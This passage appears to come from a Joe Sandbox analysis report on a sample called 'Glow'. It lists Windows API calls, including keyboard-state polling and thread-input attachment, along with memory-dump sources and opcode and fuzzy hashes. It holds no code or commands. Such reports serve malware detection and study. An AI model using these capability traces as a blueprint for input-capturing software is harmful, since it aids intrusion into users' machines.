                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00404A35
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 429561992-0
                                                                                                                                                                          • Opcode ID: 7ad6efcf5a24d23e86c8abedd5009b7c44f1fdd93c32810f394d2a2d90118b43
                                                                                                                                                                          • Instruction ID: dc6efe95fd35d7a46e3fc9d895577c84011496826de010603e6b4d371c294a63
                                                                                                                                                                          • Opcode Fuzzy Hash: 7ad6efcf5a24d23e86c8abedd5009b7c44f1fdd93c32810f394d2a2d90118b43
                                                                                                                                                                          • Instruction Fuzzy Hash: 4DC126B16043059FC700EF68C88496BB7E9FF89748F10496EFA89AB290D735ED05CB56
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 003F8538
                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003F85D4
                                                                                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 003F85E8
                                                                                                                                                                          • CoCreateInstance.OLE32(00420CD4,00000000,00000001,00447E8C,?), ref: 003F8634
                                                                                                                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003F86B9
                                                                                                                                                                          • CoTaskMemFree.OLE32(?,?), ref: 003F8711
                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 003F879C
                                                                                                                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003F87BF
                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 003F87C6
                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 003F881B
                                                                                                                                                                          • CoUninitialize.OLE32 ref: 003F8821
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2762341140-0
                                                                                                                                                                          • Opcode ID: bfd3bbd696833ba5467fc4a727ae65bb5ce27c466a8dccf9a19427c1240c6575
                                                                                                                                                                          • Instruction ID: 005d5c8e405fc3cd4bb7d75e722be1839c4a15fd8f2743e53546764a3689828e
                                                                                                                                                                          • Opcode Fuzzy Hash: bfd3bbd696833ba5467fc4a727ae65bb5ce27c466a8dccf9a19427c1240c6575
                                                                                                                                                                          • Instruction Fuzzy Hash: 2BC12B75A00209EFCB15DFA4C888DAEBBF9FF48344B1584A9E519DB261DB30ED45CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 003E039F
                                                                                                                                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 003E03F8
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 003E040A
                                                                                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 003E042A
                                                                                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 003E047D
                                                                                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 003E0491
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 003E04A6
                                                                                                                                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 003E04B3
                                                                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003E04BC
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 003E04CE
                                                                                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003E04D9
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2706829360-0
                                                                                                                                                                          • Opcode ID: 9b651fcf30690094c4a023ab7c61d367e99bef84b0f3851f2796e63d47e59afd
                                                                                                                                                                          • Instruction ID: ab14af4be428f94a7b81f64b95b06e1bbf28e8d750e1f9ce46829709802cee16
                                                                                                                                                                          • Opcode Fuzzy Hash: 9b651fcf30690094c4a023ab7c61d367e99bef84b0f3851f2796e63d47e59afd
                                                                                                                                                                          • Instruction Fuzzy Hash: 8B419375E00229DFCF05DFA5D8449EEBBB9FF08344F018169E915AB2A1C774A985CFA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 003EA65D
                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 003EA6DE
                                                                                                                                                                          • GetKeyState.USER32(000000A0), ref: 003EA6F9
                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 003EA713
                                                                                                                                                                          • GetKeyState.USER32(000000A1), ref: 003EA728
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 003EA740
                                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 003EA752
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 003EA76A
                                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 003EA77C
                                                                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 003EA794
                                                                                                                                                                          • GetKeyState.USER32(0000005B), ref: 003EA7A6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 541375521-0
                                                                                                                                                                          • Opcode ID: f9cf8443a2c5b7cd0c7e4434f42243c8427f6838f13fdf0e26a371ba4316bc72
                                                                                                                                                                          • Instruction ID: 2929481b0715458952ee3a456a9e60711562714b5a796e8a7bbdda7247208669
                                                                                                                                                                          • Opcode Fuzzy Hash: f9cf8443a2c5b7cd0c7e4434f42243c8427f6838f13fdf0e26a371ba4316bc72
                                                                                                                                                                          • Instruction Fuzzy Hash: 4641C864504FE96DFF32D6A184043E5BEF16F12344F0A8259D5C64A6C2EBA4BDC8C753
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$BuffCharLower
                                                                                                                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                          • API String ID: 707087890-567219261
                                                                                                                                                                          • Opcode ID: 2883f5ce3d483057ba9080f640ed1327430f2582cedf2db98880009a2c2a442c
                                                                                                                                                                          • Instruction ID: 9101c69673174e466ef81ad5db7d1ebd2ff5a5936b8ee275547492a00c824b31
                                                                                                                                                                          • Opcode Fuzzy Hash: 2883f5ce3d483057ba9080f640ed1327430f2582cedf2db98880009a2c2a442c
                                                                                                                                                                          • Instruction Fuzzy Hash: 3C51E572A10116ABCB14EF68C9509BEB3A1BF55360720823BE826FB3C2D739DD41C794
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoInitialize.OLE32 ref: 004041D1
                                                                                                                                                                          • CoUninitialize.OLE32 ref: 004041DC
                                                                                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00420B44,?), ref: 00404236
                                                                                                                                                                          • IIDFromString.OLE32(?,?), ref: 004042A9
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00404341
                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 00404393
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                          • API String ID: 636576611-1287834457
                                                                                                                                                                          • Opcode ID: 7901c105fc4defa039120ec0b66c52de45e66f320250377ad48382d10e284170
                                                                                                                                                                          • Instruction ID: 5ac4595bd7803a3a4e99a648ba71b3b3050a3d1261872724e866f5dc9cef4d8c
                                                                                                                                                                          • Opcode Fuzzy Hash: 7901c105fc4defa039120ec0b66c52de45e66f320250377ad48382d10e284170
                                                                                                                                                                          • Instruction Fuzzy Hash: 5261BFB07083019FD311DF64D888B6BB7E4AF89754F00096EFA81AB291C774ED45CB9A
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocalTime.KERNEL32(?), ref: 003F8C9C
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 003F8CAC
                                                                                                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003F8CB8
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003F8D55
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003F8D69
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003F8D9B
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 003F8DD1
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003F8DDA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                          • API String ID: 1464919966-438819550
                                                                                                                                                                          • Opcode ID: d77310f8b5e5c1e22fb3cbcfc6ef9bd60a74844d9e6200915c4eeeffcc8c4831
                                                                                                                                                                          • Instruction ID: d9494599caf5821bfe92508fe19751de1d6b1ce2408576d96512c4f0bd684994
                                                                                                                                                                          • Opcode Fuzzy Hash: d77310f8b5e5c1e22fb3cbcfc6ef9bd60a74844d9e6200915c4eeeffcc8c4831
                                                                                                                                                                          • Instruction Fuzzy Hash: 0C617EB25043099FCB15EF60C8449AEB3E8FF89310F04496EFA99CB251DB35E945CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateMenu.USER32 ref: 00414715
                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00414724
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004147AC
                                                                                                                                                                          • IsMenu.USER32(?), ref: 004147C0
                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 004147CA
                                                                                                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004147F7
                                                                                                                                                                          • DrawMenuBar.USER32 ref: 004147FF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                          • String ID: 0$F
                                                                                                                                                                          • API String ID: 161812096-3044882817
                                                                                                                                                                          • Opcode ID: fe6a621273cd880c7fcb4000a0695a0993064d09ec02347c4df92b31577e24b6
                                                                                                                                                                          • Instruction ID: 3addf3efc82928de2baa7a36b6edde7cc526005654bd83a0e5f79c219229ab63
                                                                                                                                                                          • Opcode Fuzzy Hash: fe6a621273cd880c7fcb4000a0695a0993064d09ec02347c4df92b31577e24b6
                                                                                                                                                                          • Instruction Fuzzy Hash: DC417CB9A01205EFDB14DF64D844EEA7BB6FF49314F144029FA4597390C774A910CB68
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333
                                                                                                                                                                            • Part of subcall function 003E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 003E4620
                                                                                                                                                                          • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 003E28B1
                                                                                                                                                                          • GetDlgCtrlID.USER32 ref: 003E28BC
                                                                                                                                                                          • GetParent.USER32 ref: 003E28D8
                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 003E28DB
                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 003E28E4
                                                                                                                                                                          • GetParent.USER32(?), ref: 003E28F8
                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 003E28FB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 711023334-1403004172
                                                                                                                                                                          • Opcode ID: 68febf1e06b491fa8c923ceb28a1f9ed2a96820ce6bfe331777e9da74e726e78
                                                                                                                                                                          • Instruction ID: bb88acd9419f18fe97d65d7b9a254c3f3f6ae27ebefff3a1f6b4b8b183f154ff
                                                                                                                                                                          • Opcode Fuzzy Hash: 68febf1e06b491fa8c923ceb28a1f9ed2a96820ce6bfe331777e9da74e726e78
                                                                                                                                                                          • Instruction Fuzzy Hash: CD21AAB5D00228BBCF02AF61CC85EEEBBB8EF06350F104266B951A71D1DB795419DB64
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333
                                                                                                                                                                            • Part of subcall function 003E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 003E4620
                                                                                                                                                                          • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 003E2990
                                                                                                                                                                          • GetDlgCtrlID.USER32 ref: 003E299B
                                                                                                                                                                          • GetParent.USER32 ref: 003E29B7
                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 003E29BA
                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 003E29C3
                                                                                                                                                                          • GetParent.USER32(?), ref: 003E29D7
                                                                                                                                                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 003E29DA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                          • String ID: ComboBox$ListBox
                                                                                                                                                                          • API String ID: 711023334-1403004172
                                                                                                                                                                          • Opcode ID: cbc939fb7a77f442f47639057107c8c50b0a43a16c5f182762b1865193bfab1b
                                                                                                                                                                          • Instruction ID: c3218ca8ab1434eafc21b11ed0381808be0b87b7cc7c6f718916fbfc00878532
                                                                                                                                                                          • Opcode Fuzzy Hash: cbc939fb7a77f442f47639057107c8c50b0a43a16c5f182762b1865193bfab1b
                                                                                                                                                                          • Instruction Fuzzy Hash: B121C6B5D00264BBCF02AFA1CC85EEFBBB8EF05340F104166B951A71D6CB795819DB64
                                                                                                                                                                          APIs
                                                                                                                                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00414539
                                                                                                                                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 0041453C
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414563
                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00414586
                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004145FE
                                                                                                                                                                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00414648
                                                                                                                                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00414663
                                                                                                                                                                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 0041467E
                                                                                                                                                                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00414692
                                                                                                                                                                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 004146AF
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$LongWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 312131281-0
                                                                                                                                                                          • Opcode ID: 7323047925e6144a3a406dba8e862b8614b54d922dc9d9f7beacc0ee7d6114e1
                                                                                                                                                                          • Instruction ID: be4a38114679b2b96c52289ab8794361c149ad6fe5670b6a88b7d0cf6c09d612
                                                                                                                                                                          • Opcode Fuzzy Hash: 7323047925e6144a3a406dba8e862b8614b54d922dc9d9f7beacc0ee7d6114e1
                                                                                                                                                                          • Instruction Fuzzy Hash: 08618EB5A00208AFDB10DFA4CD81EEE77B8EF49314F10415AFA14E73A1C778A985DB54
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 003EBB18
                                                                                                                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003EABA8,?,00000001), ref: 003EBB2C
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 003EBB33
                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003EABA8,?,00000001), ref: 003EBB42
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 003EBB54
                                                                                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003EABA8,?,00000001), ref: 003EBB6D
                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003EABA8,?,00000001), ref: 003EBB7F
                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003EABA8,?,00000001), ref: 003EBBC4
                                                                                                                                                                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003EABA8,?,00000001), ref: 003EBBD9
                                                                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003EABA8,?,00000001), ref: 003EBBE4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2156557900-0
                                                                                                                                                                          • Opcode ID: 1091065fae3962e2f5e56bae98935a24daf4c80b76501ff7b02c539668007687
                                                                                                                                                                          • Instruction ID: fd60fb7750a4d8ea8a61725ce961e64dec77f27c353bb6b9df76bf08e869b0a3
                                                                                                                                                                          • Opcode Fuzzy Hash: 1091065fae3962e2f5e56bae98935a24daf4c80b76501ff7b02c539668007687
                                                                                                                                                                          • Instruction Fuzzy Hash: 3931C3B1908319BFDB129B55DC84FAFB7ADEB44716F218125FA05CB1E4C774D8808B28
                                                                                                                                                                          APIs
                                                                                                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00382AF9
                                                                                                                                                                          • OleUninitialize.OLE32(?,00000000), ref: 00382B98
                                                                                                                                                                          • UnregisterHotKey.USER32(?), ref: 00382D7D
                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 003C3A1B
                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 003C3A80
                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003C3AAD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
